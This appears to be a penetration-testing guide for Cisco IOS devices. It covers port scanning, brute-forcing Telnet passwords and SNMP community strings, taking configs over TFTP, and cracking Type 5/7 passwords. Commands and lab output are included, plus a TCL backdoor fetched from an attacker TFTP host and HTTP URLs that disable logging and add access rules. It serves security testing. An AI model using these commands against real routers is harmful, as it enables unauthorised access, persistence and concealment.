Cisco Specific Testing:

---

Methodology

• Scan & Fingerprint.

  • The purpose of 'Scan & Fingerprint' is to identify open ports on the target device and attempt to determine the exact IOS version.  This then sets the plan for further attacks.

  • It Telnet is active, then password guessing attacks should be performed.

  • If SNMP is active, then community string guessing should be performed.
• Credentials Guessing.

  • If a network engineer/administrator has configured just one Cisco device with a poor password, then the whole network is open to attack.  Attempting to connect with various usernames/passwords is a mandatory step to testing the level of security that the device offers.

  • Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
• Connect

  • Once you have identified the access credentials, whether that be HTTP, Telnet or SSH, then connect to the target device to identify further information.

  • If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
• Check for bugs

  • To check for known bugs, vulnerabilities or security flaws with the device, a good security scanner should be used.

    • The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 
    • There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
• Further your testing

  • To further the attack into the target network, some changes need to be made to the running-config file of the target device. There are two main categories for configuration files with Cisco routers - running-config and startup-confg:

    • running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  
    • startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

  • Once you have access to the config files, you will need enable (privileged mode) access for this, you can add an access list rule to allow your IP address into the internal network.   The following ACL will allow the defined <IP> access to any internal IP address. So if the router is protecting a web server and an email server, this ACL will allow you to pass packets to those IP addresses on any port.  Therefore you should be able to port scan them efficiently.

    • #> access-list 100 permit ip <IP> any

Scan & Fingerprint.

• Port Scanning
  • nmap

    • To effectively scan a Cisco device, both TCP and UDP ports across the whole range must be checked.
      There are a number of tools that can achieve the goal, however we will stick with nmap examples.

      • TCP scan: - This will perform a TCP scan, fingerprint, be verbose, scan ports 1-65535 against IP 10.1.1.1 and output the results in normal mode to TCP.scan.txt file. nmap  -sT  -O  -v  -p  1-65535  <IP>  -oN  TCP.scan.txt

      • UDP scan: - This will perform a UDP scan, be verbose,  scan ports 1.65535 against IP 10.1.1.1 and output the results in normal mode to UDP.scan.txt file. nmap  -sU  -v  -p  1-65535  <IP>  -oN  UDP.scan.txt

  • Other tools

    • ciscos is a scanner for discovering Cisco devices in a given CIDR network range.
      

      • Usage: ./ciscos <IP> <class> [option]
    • mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
• Fingerprinting

  • cisco-torch is a fingerprinter for Cisco routers. There are a number of different fingerprinting switches, such as SSH, telnet or HTTP e.g.  The -A switch should perform all scans, however I have found it to be unreliable.

    • BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

      • List of targets contains 1 host(s) 14489:  

        Checking 10.1.1.175 ...

        Fingerprint:2552511255251325525324255253311310

        Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP)

        Fingerprinting Successful

      • Cisco-IOS Webserver found  

        HTTP/1.1 401 Unauthorized

        Date: Mon, 01 Mar 1993 00:34:11 GMT

        Server: cisco-IOS Accept-Ranges: none

        WWW-Authenticate: Basic realm="level_15_access"

        401 Unauthorized

  • nmap version scan: - Once open ports have been identified, version scanning should be performed against them.  In this example, TCP ports 23 and 80 were found to be open.

    • TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

    • UDP Port scan - nmap -sV -O -v -p 161,162 <IP> -oN UDP.version.txt

Credentials Guessing.

• CAT (Cisco Auditing Tool): - This tool  extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

  • ./CAT  -h  <IP>  -a  password.wordlist

  • BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a /tmp/dict.txt

    Guessing passwords:

    Invalid Password: 1234

    Invalid Password: 2read

    Invalid Password: 4changes

    Password Found: telnet

• brute-enabler is an internal enable password guesser.  You require valid non-privilege mode credentials to use this tool, they can be either SSH or Telnet.

  • ./enabler <IP> [-u username] -p password /password.wordlist [port]

  • BT brute-enable-v.1.0.2 # ./enabler  10.1.1.175  telnet  /tmp/dict.txt 

    [`] OrigEquipMfr... wrong password

    [`] Cisco... wrong password

    [`] agent... wrong password

    [`] all... wrong password

    [`] possible password found: cisco

• hydra: - hydra is a multi-functional password guessing tool.  It can connect and pass guessed credentials for many protocols and services, including Cisco Telnet which may only require a password. (Make sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet server!).

  • BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

  • Hydra (http://www.thc.org) starting at 2007-02-26 10:54:10 [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59),

    ~14 tries per task [DATA] attacking service cisco on port 23

    Error: Child with pid 21671 was disconnected - retrying (1 of 1 retries)

    [STATUS] attack finished for 10.1.1.175 (waiting for childs to finish)

    [23][cisco] host: 10.1.1.175   login:    password: telnet

SNMP Attacks.

• CAT (Cisco Auditing Tool): - This tool  extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.

  • ./CAT  -h  <IP>  -w  SNMP.wordlist

  • BT cisco-auditing-tool-v.1.0# CAT -h 10.1.1.175 -w /tmp/snmp.txt

    Checking Host: 10.1.1.175

    Guessing passwords:

    Invalid Password: cisco

    Invalid Password: ciscos

    Guessing Community Names:

    Invalid Community Name: CISCO

    Invalid Community Name: OrigEquipMfr

    Community Name Found: Cisco

• onesixtyone is a reliable SNMP community string guesser.   Once it identifies the correct community string, it will display accurate fingerprinting information.
  

  • onesixytone  -c  SNMP.wordlist  <IP>
  • BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

• snmpwalk: - snmpwalk is part of the SNMP toolkit.  After a valid community string is identified, you should use snmpwalk to 'walk' the SNMP Management Information Base (MIB) for further information.  Ensure that you get the correct version of SNMP protocol in use or it will not work correctly.  It may be a good idea to redirect the output to a text file for easier viewing as the tool outputs a large amount of text.
  

  • snmapwalk  -v  <Version>  -c  <Community string>  <IP>

  • BT# snmpwalk -v 1 -c enable 10.1.1.1

    SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.185 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (363099) 1:00:30.99 SNMPv2-MIB::sysContact.0 = STRING: SNMPv2-MIB::sysName.0 = STRING: router SNMPv2-MIB::sysLocation.0 = STRING: SNMPv2-MIB::sysServices.0 = INTEGER: 78 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00 IF-MIB::ifNumber.0 = INTEGER: 4

Connecting.

• Telnet

  • The telnet service on Cisco devices can authenticate users based upon a password in the config file or against a RADIUS or TACACS server. If the device is simply using a VTY configuration for Telnet access, then it is likely that only a password is required to log on. If the device is passing authentication details to a RADIUS or TACACS server, then a combination of username and password will be required.

    •  telnet  <IP>
    • Sample Banners

      • VTY configuration:
        BT / # telnet 10.1.1.175
        Trying 10.1.1.175...
        Connected to 10.1.1.175.
        Escape character is '^]'.
        User Access Verification
        Password:
        router>

      • External authentication server:
        BT / # telnet 10.1.1.175
        Trying 10.1.1.175...
        Connected to 10.1.1.175.
        Escape character is '^]'.
        User Access Verification
        Username: admin
        Password:
        router>

• SSH
• Web Browser

  • HTTP/HTTPS: - Web based access can be achieved via a simple web browser, as long as the HTTP adminstration service is active on the target device:

    • This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
    • Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
    • Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
      • Cisco Systems Accessing Cisco 2610 "router"
        • Show diagnostic log - display the diagnostic log.
        • Monitor the router - HTML access to the command line interface at level 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

        • Show tech-support - display information commonly needed by tech support.

        • Extended Ping - Send extended ping commands.   

        • VPN Device Manager (VDM) - Configure and monitor Virtual Private Networks (VPNs) through the web interface.
• TFTP

  • Trivial File Transfer Protocol is used to back up the config files of the router.  Should an attacker discover the enable password or RW SNMP community string, the config files are easy to retrieve.

    •  Cain & Abel -Cisco Configuration Download/Upload (CCDU)  With this tool the RW community string and the version of SNMP in use and running-config file can be downloaded to your local system. 

    • ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

  • There are ways of extracting the config files directy from the router even if the names have changed, however you are really limited by the speed of the TFTP server to dictionary based attacks.  Cisco-torch is one of the tools that will do this.  It will attempt to retrieve config files listed in the brutefile.txt file:
    
    

    • ./cisco-torch.pl <options> <IP,hostname,network>
    • ./cisco-torch.pl <options> -F <hostlist>
    • Creating backdoors in Cisco IOS using TCL

      • en
        router
        source tftp tftp://<Attacker_TFTP_SERVER>/tclshell_ios.tcl

      • telnet <router IP>:Port
      • tclshell

Check for Bugs

• Attack Tools

  • Cisco Global Exploiter (CGE-13): - CGE is an attempt to combine all of the Cisco attacks into one tool.

    • perl cge.pl <target> <vulnerability number>
      

      • [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

      • [2] - Cisco IOS Router Denial of Service Vulnerability

      • [3] - Cisco IOS HTTP Auth Vulnerability

      • [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

      • [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

      • [6] - Cisco 675 Web Administration Denial of Service Vulnerability

      • [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

      •  [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

      • [9] - Cisco 514 UDP Flood Denial of Service Vulnerability

      • [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability

      • [11] - Cisco Catalyst Memory Leak Vulnerability

      • [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability

      • [13] - 0 Encoding IDS Bypass Vulnerability (UTF)
      • [14] - Cisco IOS HTTP Denial of Service Vulnerability

  • HTTP Arbitrary Access vulnerability: - A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability.  This flaw allowed an external attacker to execute router commands via the web interface.  Cisco devices have a number of  privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15  are used.  Level 15 is Privileged EXEC mode, the same as enable mode.  By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode.

    • Web browse to the Cisco device: http://<IP>

    • Click cancel to the logon box and enter the following address:

      •  http://<IP>/level/99/exec/show/config (You may have to scroll through all of the levels from 16-99 for this to work.)

    • To raise the logging level to only log emergencies:

      • http://<IP>/level/99/configure/logging/trap/emergencies/CR

    • To add a rule to allow Telnet:
      

      • http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR

  • ios-w3-vuln: - A CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.)  As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally. 

    • ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
• Common Vulnerabilities and Exploits (CVE) Information
  • Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

Configuration Files.

• Configuration files explained
  • The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

  • Telnet Access. If telnet is configured on the VTY (Virtual TTY) interface, then the credentials will be in the config file: line vty 0 4 password telnet login

  • SNMP Settings. If the target router is configured to use SNMP, then the SNMP community strings will be in the config file.  It should have the read-only (RO) and may have the read-write (RW) strings: snmp-server community Cisco RO snmp-server community enable RW

  • Password Encryption Utilised

    • Enable password. The Holy Grail, the 'enable' password, the root level access to the router.  There are two main methods of storing the enable password in a config file, type 5 and type 7, MD5 hashed and Viginere encryption respectively. An example is: enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.    

      • Type 7 should be avoided as it is extremely easy to crack, it can even be done by hand!  An example Type 7 password is given below but does not exist in the example running-config file: enable password 7 104B0718071B17 They can be cracked with the following tools: 

        • Boson GetPass
        • Cain
        • Online cracking

      • Type 5 password protection is much more secure.  However, should an attacker get hold of the configuration file somehow, then the MD5 hash can be extracted and cracked offline with the following tools: 

        • Cain
        • John the Ripper
          • Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA.

  • version 12.2
    service config
    service timestamps debug datetime msec
    service timestamps log datetime msec
    no service password-encryption
    !
    hostname vapt-router
    !
    logging queue-limit 100
    enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
    enable password router
    !
    memory-size iomem 10
    ip subnet-zero
    no ip routing
    !
    
    ip audit notify log
    ip audit po max-events 100
    !
    no voice hpi capture buffer
    no voice hpi capture destination 
    !
    mta receive maximum-recipients 0
    
    !
    interface Ethernet0/0
     ip address 10.1.1.175 255.255.255.0
     no ip route-cache
     no ip mroute-cache
     half-duplex
    !
    interface Serial0/0
     no ip address
     no ip route-cache
     no ip mroute-cache
     shutdown
    !
    ip http server
    no ip http secure-server
    ip classless
    !
    
    snmp-server community Cisco RO
    snmp-server community enable RW
    snmp-server enable traps tty
    call rsvp-sync
    !
    mgcp profile default
    !
    dial-peer cor custom
    !
    line con 0
    line aux 0
    line vty 0 4
    password telnet
    login
    !
    end

• Configuration Testing Tools
  • Nipper
  • fwauto (Beta)